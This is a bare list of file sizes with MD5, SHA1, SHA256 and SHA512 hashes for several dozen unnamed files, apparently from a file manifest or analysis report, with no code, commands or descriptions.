  SHA512 95175d63b54fa22e6d1e900806a7c0b6801f8d58986963c1072992bba699365edc58e0b5cff30a506ac1dda9ac9f7c5389a42a7abf878701a8692cd490873d8f
- Filesize 16B
  MD5 6752a1d65b201c13b62ea44016eb221f
  SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
  SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
  SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
- Filesize 10KB
  MD5 2d88482b5777feef2f6bfaf5d59a87d5
  SHA1 26b2ea09ec51f30fea68e2246ed4dfca346c2732
  SHA256 368426985d2bc318dff0e30afa4631de76e13ee6cfdc5570ffe1e86e58ff07d5
  SHA512 e02934945f20c71764a893b503401df593d8bf3490e5d7b0845644fff28611f373b75739bc65175d650daa4ae3f521e7e9a5a30e50a96f7693d1181ae3dcda73
- Filesize 264KB
  MD5 f50f89a0a91564d0b8a211f8921aa7de
  SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
  SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
  SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
- Filesize 944B
  MD5 77d622bb1a5b250869a3238b9bc1402b
  SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
  SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
  SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
- Filesize 944B
  MD5 eb1ad317bd25b55b2bbdce8a28a74a94
  SHA1 98a3978be4d10d62e7411946474579ee5bdc5ea6
  SHA256 9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
  SHA512 d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0
- Filesize 1KB
  MD5 b736b1cf455023520eb7abb7f35ddaa2
  SHA1 f3d04d1c5d14eb92c1e466ee4767ea65680b4070
  SHA256 3530522d67a50208cbc38ada3fc1ce9c3f858488e1573e2cf1da6748040b8849
  SHA512 5bff0ecabba8d72a06456a54911e623e519b4ed78d21e32de94cfae5e21636f46e5134c95abd184b43fec7fd2fd0a12087a330eb3cd41cb5507db4a1996c5158
- Filesize 1KB
  MD5 2b474f72e9491bba41bfa970f5f5b832
  SHA1 4c637d9e7c3a900a298c80a29a75cc20cc8b1892
  SHA256 f71cc7ca2d9276fc79352f6a4dc2bba8942d37da050614793eee32e3886bce5c
  SHA512 979fa8f87dd77cc863e0d6eb555fc82f3d404554acab3d63a762dba3a62bd946336265c6bc0a34e7c3b5a02baf72234fc4cdf77925bbf6123e09af4478e945ce
- Filesize 106KB
  MD5 870fea4e961e2fbd00110d3783e529be
  SHA1 a948e65c6f73d7da4ffde4e8533c098a00cc7311
  SHA256 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
  SHA512 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88
- Filesize 46KB
  MD5 93fe6d3a67b46370565db12a9969d776
  SHA1 ff520df8c24ed8aa6567dd0141ef65c4ea00903b
  SHA256 92ec61ca9ac5742e0848a6bbb9b6b4cda8e039e12ab0f17fb9342d082dde471b
  SHA512 5c91b56198a8295086c61b4f4e9f16900a7ec43ca4b84e793bc8a3fc8676048cab576e936515bf2971318c7847f1314674b3336fe83b1734f9f70d09615519ac
- Filesize 56KB
  MD5 813fc3981cae89a4f93bf7336d3dc5ef
  SHA1 daff28bcd155a84e55d2603be07ca57e3934a0de
  SHA256 4ac7fb7b354069e71ebf7fcc193c0f99af559010a0ad82a03b49a92deb0f4d06
  SHA512 ce93f21b315d96fde96517a7e13f66aa840d4ad1c6e69e68389e235e43581ad543095582ebcb9d2c6dda11c17851b88f5b1ed1d59d354578fe27e7299bbea1cc
- Filesize 103KB
  MD5 f65d2fed5417feb5fa8c48f106e6caf7
  SHA1 9260b1535bb811183c9789c23ddd684a9425ffaa
  SHA256 574fe8e01054a5ba07950e41f37e9cf0aea753f20fe1a31f58e19202d1f641d8
  SHA512 030502fa4895e0d82c8cce00e78831fc3b2e6d956c8cc3b9fb5e50cb23ef07cd6942949a9f16d02da6908523d9d4ef5f722fb1336d4a80cd944c9f0cb11239ab
- Filesize 33KB
  MD5 4ae75c47dbdebaa16a596f31b27abd9e
  SHA1 a11f963139c715921dedd24bc957ab6d14788c34
  SHA256 2308ee238cc849b1110018b211b149d607bf447f4e4c1e61449049eab0cf513d
  SHA512 e908fecb52268fac71933e2fdb96e539bdebe4675dfb50065aee26727bac53e07cca862193bcb3ab72d2ae62d660113a47e73e1e16db401480e4d3fd34d54fa8
- Filesize 84KB
  MD5 6f810f46f308f7c6ccddca45d8f50039
  SHA1 6ee24ff6d1c95ba67e1275bb82b9d539a7f56cea
  SHA256 39497259b87038e86c53e7a39a0b5bbbfcebe00b2f045a148041300b31f33b76
  SHA512 c692367a26415016e05ebe828309d3ffec290c6d2fd8cc7419d529a51b0beda00ccdc327c9f187ae3ca0cc96336d23d84a8ff95b729c8958b14fb91b6da9e878
- Filesize 24KB
  MD5 0e7612fc1a1fad5a829d4e25cfa87c4f
  SHA1 3db2d6274ce3dbe3dbb00d799963df8c3046a1d6
  SHA256 9f6965eb89bbf60df0c51ef0750bbd0655675110d6c42eca0274d109bd9f18a8
  SHA512 52c57996385b9a573e3105efa09fd6fd24561589b032ef2b2ee60a717f4b33713c35989f2265669f980646d673e3c387b30b9fc98033bb8ca7c59ece1c17e517
- Filesize 41KB
  MD5 7a31bc84c0385590e5a01c4cbe3865c3
  SHA1 77c4121abe6e134660575d9015308e4b76c69d7c
  SHA256 5614017765322b81cc57d841b3a63cbdc88678ff605e5d4c8fdbbf8f0ac00f36
  SHA512 b80cd51e395a3ce6f345b69243d8fc6c46e2e3828bd0a7e63673a508d889a9905d562cac29f1ed394ccfcda72f2f2e22f675963dd96261c19683b06dea0a0882
- Filesize 48KB
  MD5 bb4aa2d11444900c549e201eb1a4cdd6
  SHA1 ca3bb6fc64d66deaddd804038ea98002d254c50e
  SHA256 f44d80ab16c27ca65da23ae5fda17eb842065f3e956f10126322b2ea3ecdf43f
  SHA512 cd3c5704e5d99980109fdc505d39ad5b26a951685e9d8e3fed9e0848cd44e24cc4611669dbdb58acc20f1f4a5c37d5e01d9d965cf6fe74f94da1b29aa2ff6931
- Filesize 60KB
  MD5 081c878324505d643a70efcc5a80a371
  SHA1 8bef8336476d8b7c5c9ef71d7b7db4100de32348
  SHA256 fcb70b58f94f5b0f9d027999cce25e99ddcc8124e4ddcc521cb5b96a52faaa66
  SHA512 c36293b968a2f83705815ef3a207e444eeb7667ad9af61df75e85151f74f2fe0a299b3b1349de0d410bbbaea9f99cac5228189099a221de5fa1e20c97c648e32
- Filesize 859KB
  MD5 6d649e03da81ff46a818ab6ee74e27e2
  SHA1 90abc7195d2d98bac836dcc05daab68747770a49
  SHA256 afede0c40e05ce5a50ff541b074d878b07753b7c1b21d15f69d17f66101ba8fd
  SHA512 e39621c9a63c9c72616ae1f960e928ad4e7bad57bfb5172b296a7cc49e8b8e873be44247a475e7e1ded6bc7e17aa351397cdeb40841258e75193586f4649d737
- Filesize 80KB
  MD5 b054bb4df3447342f355d857262032b8
  SHA1 c5fb4c36162a212841a3213161ea110664a592f1
  SHA256 b90e7ee3332ef8f5936449b7bacd2e7d99d582ef009837c1c47477932dbbefd8
  SHA512 ccf3aed350360f39359e97f0384db1844f7b8d7e4121e66be9b606fe20e957afddb2ce9cd69a927623abae1f45d1506f4374e227927ee95cea01f7f9c6c636b9
- Filesize 1.1MB
  MD5 daa2eed9dceafaef826557ff8a754204
  SHA1 27d668af7015843104aa5c20ec6bbd30f673e901
  SHA256 4dab915333d42f071fe466df5578fd98f38f9e0efa6d9355e9b4445ffa1ca914
  SHA512 7044715550b7098277a015219688c7e7a481a60e4d29f5f6558b10c7ac29195c6d5377dc234da57d9def0c217bb3d7feca332a64d632ca105503849f15e057ea
- Filesize 23KB
  MD5 6f818913fafe8e4df7fedc46131f201f
  SHA1 bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
  SHA256 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
  SHA512 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639
- Filesize 203KB
  MD5 eac369b3fde5c6e8955bd0b8e31d0830
  SHA1 4bf77158c18fe3a290e44abd2ac1834675de66b4
  SHA256 60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c
  SHA512 c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778
- Filesize 1.4MB
  MD5 178a0f45fde7db40c238f1340a0c0ec0
  SHA1 dcd2d3d14e06da3e8d7dc91a69b5fd785768b5fe
  SHA256 9fcb5ad15bd33dd72122a171a5d950e8e47ceda09372f25df828010cde24b8ed
  SHA512 4b790046787e57b9414a796838a026b1530f497a75c8e62d62b56f8c16a0cbedbefad3d4be957bc18379f64374d8d3bf62d3c64b53476c7c5005a7355acd2cee
- Filesize 615KB
  MD5 9c223575ae5b9544bc3d69ac6364f75e
  SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
  SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
  SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09
- Filesize 456B
  MD5 4531984cad7dacf24c086830068c4abe
  SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
  SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
  SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122
- Filesize 24KB
  MD5 666358e0d7752530fc4e074ed7e10e62
  SHA1 b9c6215821f5122c5176ce3cf6658c28c22d46ba
  SHA256 6615c62fa010bfba5527f5da8af97313a1af986f8564277222a72a1731248841
  SHA512 1d3d35c095892562ddd2868fbd08473e48b3bb0cb64ef9ccc5550a06c88dda0d82383a1316b6c5584a49ca28ed1ef1e5ca94ec699a423a001ccd952bd6bd553d
- Filesize 608KB
  MD5 bd2819965b59f015ec4233be2c06f0c1
  SHA1 cff965068f1659d77be6f4942ca1ada3575ca6e2
  SHA256 ab072d20cee82ae925dae78fd41cae7cd6257d14fd867996382a69592091d8ec
  SHA512 f7758bd71d2ad236bf3220db0ad26f3866d9977eab311a5912f6e079b59fa918735c852de6dbf7b5fee9e04124bc0cd438c4c71edc0c04309330108ba0085d59
- Filesize 287KB
  MD5 7a462a10aa1495cef8bfca406fb3637e
  SHA1 6dcbd46198b89ef3007c76deb42ab10ba4c4cf40
  SHA256 459bca991fcb88082d49d22cc6ebffe37381a5bd3efcc77c5a52f7a4bb3184c0
  SHA512 d2b7c6997b4bd390257880a6f3336e88d1dd7159049811f8d7c54e3623e9b033e18e8922422869c81de72fc8c10890c173d8a958d192dd03bfc57cffaea1ac7b
- Filesize 60B
  MD5 d17fe0a3f47be24a6453e9ef58c94641
  SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize 4KB
  MD5 a70de8b624d57468cd6ba2caa857a766
  SHA1 006804e96515d4386eed3f19be55d942a5f77eb2
  SHA256 51e2ff9e9a0a687549639362d080364976e3ae20bf5acddc05bc621eb6f19961
  SHA512 725f6c8f721656f1f4b071dd3dfb9e97011b47f3456af29537175445f8c6bcf25b96414bfbf6e7c0570ce8d2e2faf0fce792b7ce2dc9051b555956e970d62131
- Filesize 293KB
  MD5 4c32f44e814181a03a78c5ae49769a05
  SHA1 8747a68e21e9340014a177e6504a39cface980a9
  SHA256 e2bbd4e53debeeea41e70dbef436551531a110bb22c36a549ac69f5f3d0594a1
  SHA512 b6dac73c00928a6af6b36f896ed80148c62258085210acffa8c82236f7e493e4325852dea85363681853e608406c8ef9a1243537d97e14e7d635111051e74105
- Filesize 498KB
  MD5 874c9a7097695b51f8dca83eb09e3fdc
  SHA1 9e3d827970443680ffc2269c863309f7d5b56f25
  SHA256 eefc76781b28ea5ae4cb875bd319b8fba2dc75b6208f21f6eceb9373c09a26c0
  SHA512 449eb4cf3bd3c7782b652c2d37c5e3157ad9c210f693d393034ecbe4477c4a9bca9fedcb96528df8b5e005b6ad8c46d50a0630f105928ee0ec6161f946840292
- Filesize 11KB
  MD5 a33e5b189842c5867f46566bdbf7a095
  SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
  SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
  SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
- Filesize 1.0MB
  MD5 020eb5a7de34d71d4e417d8c166be94b
  SHA1 f35af3f0fd15ca792e31a3b5a5f8e5935eea563c
  SHA256 26639fa1ded6d583ad455746474383d0daba51b324238fdd0af77b5710c2096a
  SHA512 18070b48adb9f9271eb7803a53ca8e16dad4e9de58b50925f34902cec34b7f036837ad4503c1f0cd59a6ecf42e159ed61fbd0853c11fa7ceb81bc2a77a656d3a
- Filesize 634KB
  MD5 65cd0dc55fd3794f335323368488d8de
  SHA1 18f4657f944e3134bb07536c8793843e6e3f87cc
  SHA256 562c980db59e71dc5e739a2f925670b2b07b1ec9d257122e98004b1dbe64e13a
  SHA512 6b425035102484a00e82ca51c45d8f079057b34e0d8a07b07f71dffc5f061156ae345dc91f136c0b087f84fc39e48e572a3d9c64f18818966f2b49bb5bc179c7
- Filesize 987KB
  MD5 02a535c3ac101a8febc55e3dcec91625
  SHA1 37ca446b863e060b10351f13c089568619ba6b7a
  SHA256 2e6bdb549e48b188d61919b0af0fdc7ca79e3c3491ab88e32d2f719db4c70102
  SHA512 58982eb334d733951738d692058bf70dc571133157507e3afe32ae86b007aea3c55bf5573182da49cc49466a5cc92ef076c928889a5bb348651fa8e8c3fd9c37
- Filesize 11KB
  MD5 4a8fbd593a733fc669169d614021185b
  SHA1 166e66575715d4c52bcb471c09bdbc5a9bb2f615
  SHA256 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
  SHA512 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b
- Filesize 564KB
  MD5 4710f5af0fd59f9e66b8ba072b8a0d69
  SHA1 f2427488d6f9b1d68f48562a6e07db8c7f03713d
  SHA256 414274e866cee863b3ac6ad51317c2260504b882b141807ae602ba591a171005
  SHA512 071400a2db013800339d58f57797e8d6ed3a83549f81a34654dbcd6691425bd6b19422793442097feb6758d5931d3e47d2d18c259a75642d320e9242c32a26ca
- Filesize 11KB
  MD5 bfbc1a403197ac8cfc95638c2da2cf0e
  SHA1 634658f4dd9747e87fa540f5ba47e218acfc8af2
  SHA256 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
  SHA512 b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1
- Filesize 705KB
  MD5 d24894d890783b14fae5e2ec1e7ed12d
  SHA1 d72639f48fe725b376885cc4cf24d514c831687e
  SHA256 6e6241e04700590fb5a8aafa1c1ce7b2d967d3a5500e1bd36523a6c551bc1d2a
  SHA512 725553f75c541320310d37d70483f834857c63111c28c703aa2cd052ae362e469959e0f2e40246a29abe377186dd64c7e191f42b1a7c92c6f49e79420268695d
- Filesize 11KB
  MD5 3b068f508d40eb8258ff0b0592ca1f9c
  SHA1 59ac025c3256e9c6c86165082974fe791ff9833a
  SHA256 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
  SHA512 e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32
- Filesize 11KB
  MD5 87cbab2a743fb7e0625cc332c9aac537
  SHA1 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7
  SHA256 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023
  SHA512 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa
- Filesize 881KB
  MD5 1997f80c77960d3572fc7957d14723a9
  SHA1 1e4b1ef24a5fe9eae1cddba1c1181e33219c38be
  SHA256 fa0583647a1d0fb8c4abe0354468873cc44967d21c513dc2bf514d36bf5792c2
  SHA512 6e63504d76641e0ee5d766df8efea8072d804d63a69c2971d156c915c0a21352c092882ce42ae7b2b6a1b6984d897ff02d2fd442e10684ec0b6c6aef320b1403
- Filesize 402KB
  MD5 20c73714ea62573bf91a5e9e782fd314
  SHA1 4da1c19333a9cbb9bb1218ce226fe52589e116aa
  SHA256 ee5282793053e5657c04cf85c413f3b947062c029a3d6dd375461d08040469f4
  SHA512 0c0feb35edf7dbee5e770989e5b6c729f8f6b32d741d1937a7bea7b2cb04c5566f9fba7dd69d669623e28bc05f5d470490d275b2cadf003e99dc3b7ee82ff5fd
- Filesize 2KB
  MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
  SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
  SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
  SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6
- Filesize 652B
  MD5 5da549fceb02ea49455973a24a38af03
  SHA1 ffc8e58a2f6db064cd73195a4811694cd6d537a2
  SHA256 48c46f909efed9ac04a79a5eb9e492a5982d9210cf5e3b3a46cd89c2795a50d2
  SHA512 f0d0f244f771fe750d80d4c1e11c7233d40e4f6bf3b21e398110d2db802201ed4950df318a5af843fac721f01fa881f4ce551c53a8443e70714beff421136000
- Filesize 1004B
  MD5 c76055a0388b713a1eabe16130684dc3
  SHA1 ee11e84cf41d8a43340f7102e17660072906c402
  SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
  SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
- Filesize 607B
  MD5 9823f83a8903e95bdcf878699f862cc4
  SHA1 d133ed5f02f271a77e0b9699292e26c4ee884fbe
  SHA256 e6952964e9aa82205b484228d79e96833d6039c529f274ca1ef0ec609dda597e
  SHA512 00323bcb51c1585e2b72a0991b08190dcbc661d1d879468b24f71fa62b167f7111e83b03603b48e3b86519a2e6fb49f3dbce0ecb42893b0f243ff41a9f343ed0